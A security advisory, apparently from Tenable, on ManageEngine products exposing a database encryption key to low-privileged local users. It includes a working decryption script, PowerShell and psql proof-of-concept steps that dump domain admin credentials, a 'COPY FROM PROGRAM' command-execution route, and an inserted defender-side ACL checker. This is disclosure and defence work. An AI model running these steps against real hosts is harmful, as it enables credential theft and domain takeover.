Synopsis
An information disclosure vulnerability exists in multiple ManageEngine products that can result in encryption keys being exposed. A low-privileged OS user with access to the host where an affected ManageEngine product is installed can view and use the exposed key to decrypt product database passwords. This allows the user to access the ManageEngine product database.
An encryption key is stored in the "CryptTag" configuration in <PRODUCT_INSTALLATION_DIR>\conf\customer-config.xml.
The ManageEngine product database usernames and passwords can be found in <PRODUCT_INSTALLATION_DIR>\conf\database_params.conf.
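A defender-side check for this exposure, added here as an example that is not part of the advisory or of ManageEngine's code: it parses the output of `icacls` for the configuration file that holds the key and flags any read ACE granted to a principal that every local user belongs to. The sample `icacls` output is constructed, and the principal and rights lists are assumptions that can be extended.

```python
import re

# Principals every interactive user on the host belongs to (compare the whoami
# output in the proof of concept): a read ACE for any of them exposes the file.
LOW_PRIV_PRINCIPALS = {
    "everyone", r"builtin\users", r"nt authority\authenticated users",
    r"nt authority\interactive", r"nt authority\remote interactive logon",
}
# icacls rights that include reading file data (simple rights plus GR/RD bits)
READ_RIGHTS = {"F", "M", "RX", "R", "GR", "RD"}
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<perms>(?:\([^()]*\))+)\s*$")


def parse_icacls(output, path):
    """Parse `icacls <path>` output into {principal: [flags and rights]}.
    The first line is '<path> <principal>:<perms>'; later lines are indented
    '<principal>:<perms>'; the summary line at the end has no ACE."""
    acl = {}
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):  # only the first line carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        groups = re.findall(r"\(([^()]*)\)", m.group("perms"))
        acl[m.group("principal")] = [r for g in groups for r in g.split(",")]
    return acl


def readable_by_low_priv(acl):
    """Return [(principal, read rights)] for each low-privilege allow ACE."""
    findings = []
    for principal, rights in acl.items():
        if principal.lower() in LOW_PRIV_PRINCIPALS and "DENY" not in rights:
            granted = sorted(READ_RIGHTS & set(rights))
            if granted:
                findings.append((principal, granted))
    return findings


# Constructed sample: the default ACL inherited from Program Files, which is
# what lets a low-privileged user read the key. On a real host, feed in the
# output of `icacls "<PRODUCT_INSTALLATION_DIR>\conf\customer-config.xml"`.
SAMPLE_PATH = r"C:\Program Files\ManageEngine\ADManager Plus\conf\customer-config.xml"
SAMPLE_OUTPUT = "\n".join([
    SAMPLE_PATH + r" BUILTIN\Users:(I)(RX)",
    r"    NT AUTHORITY\SYSTEM:(I)(F)",
    r"    BUILTIN\Administrators:(I)(F)",
    "Successfully processed 1 files; Failed processing 0 files",
])
```

Run the same check against database_params.conf; any finding means the key or the encrypted credentials are readable by every local account, which is the condition the advisory describes.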
A database password can be decrypted with the following Python script (me_decrypt.py, which uses the pycryptodome package):
import sys
from Crypto.Cipher import AES          # pycryptodome
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Hash import SHA1
from Crypto.Util.Padding import unpad

if len(sys.argv) != 3:
    sys.exit("usage: me_decrypt.py <encrypted_data_in_hexstr> <key>")
data = bytearray.fromhex(sys.argv[1])
pw = sys.argv[2]
salt = data[:20]                                    # the first 20 bytes of the blob are the PBKDF2 salt
key = PBKDF2(pw, salt, 32, 65556, None, SHA1)       # 32-byte AES key via PBKDF2-HMAC-SHA1, 65556 iterations
cipher = AES.new(key, AES.MODE_CBC, iv=b'\x00'*16)  # AES-256-CBC with an all-zero IV
print(unpad(cipher.decrypt(data[20:]), 16).decode())  # ciphertext follows the salt; strip PKCS#7 padding
'''
Usage:
me_decrypt.py <encrypted_data_in_hexstr> <key>
me_decrypt.py <password_in_database_params.conf> <CryptTag_in_customer-config.xml>
python3 me_decrypt.py 'd7910c7070b09da8598b35837122217739c728f09d05354e45f7ebbe3f027781b04d2a1c' 'rfMtKVF1cDxUc0DBov8x'
wkd4uzEHFs
'''
With access to the product database, an attacker can perform the following:
- Run OS commands (e.g., via COPY ... FROM PROGRAM '<command>') with the privileges of the user account running the database server. This account is usually SYSTEM or some other administrative account.
- Modify the database to reset the password of an administrative user for the product.
- View data contents to reveal other sensitive information.
Proof of Concept:
To view domain administrative credentials in ADManager Plus build 7182:
# Verify a low-privileged domain user (duser1) is logged in
PS C:\Program Files\ManageEngine\ADManager Plus> whoami /user /groups
USER INFORMATION
User Name SID
========= ==============================================
dw\duser1 S-1-5-21-1667561354-2975149694-3384506032-1605

GROUP INFORMATION
Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users               Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON      Well-known group S-1-5-14     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
PS C:\Program Files\ManageEngine\ADManager Plus>
# Get product database username and password (encrypted)
PS C:\Program Files\ManageEngine\ADManager Plus> Select-String "(username|password)=" .\conf\database_params.conf | select -ExpandProperty line
username=admanager
password=af7638bf753b03f6eaa449be8d030589217b21d3e6ddff8adabe22aed1eebcb11f9b3b40
# Get ECTag (encryption key for domain passwords) and CryptTag (encryption key for DB passwords)
PS C:\Program Files\ManageEngine\ADManager Plus> Select-String "(ECTag|CryptTag)" .\conf\customer-config.xml | select -ExpandProperty line
<configuration name="ECTag" value="4e2e52c9c79f1b26dbe59981ab967a9cf3dd21cac24ec3905214be3eac828f19205a53709cce42bd082c8e821128ad751051f668"/>
<configuration name="CryptTag" value="hYC1D8l2-DgXdVVYPIZN"/>
# Decrypt database password using CryptTag as key
python3 me_decrypt.py 'af7638bf753b03f6eaa449be8d030589217b21d3e6ddff8adabe22aed1eebcb11f9b3b40' 'hYC1D8l2-DgXdVVYPIZN'
4p4HvCJsRC
# Decrypt ECTag using CryptTag as key
python3 me_decrypt.py '4e2e52c9c79f1b26dbe59981ab967a9cf3dd21cac24ec3905214be3eac828f19205a53709cce42bd082c8e821128ad751051f668' 'hYC1D8l2-DgXdVVYPIZN'
uBXejNXJxqYn7WeL
# Login to the database using decrypted password
PS C:\Program Files\ManageEngine\ADManager Plus> $Env:PGPASSWORD="4p4HvCJsRC"
PS C:\Program Files\ManageEngine\ADManager Plus> .\pgsql\bin\psql.exe -h 127.0.0.1 -p 33306 -d adsm -U admanager -q
adsm=>
# Grab domain administrative credentials
# Domain passwords are decrypted using the decrypted ECTag as the key
adsm=> select domain_name, user_name, pgp_sym_decrypt(password,'uBXejNXJxqYn7WeL','cipher-algo=aes256') AS "password" from ADSCredentials;
 domain_name | user_name     | password
-------------+---------------+----------
 <REDACTED>  | administrator | <REDACTED>
Solution
Apply the appropriate vendor supplied patch.
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.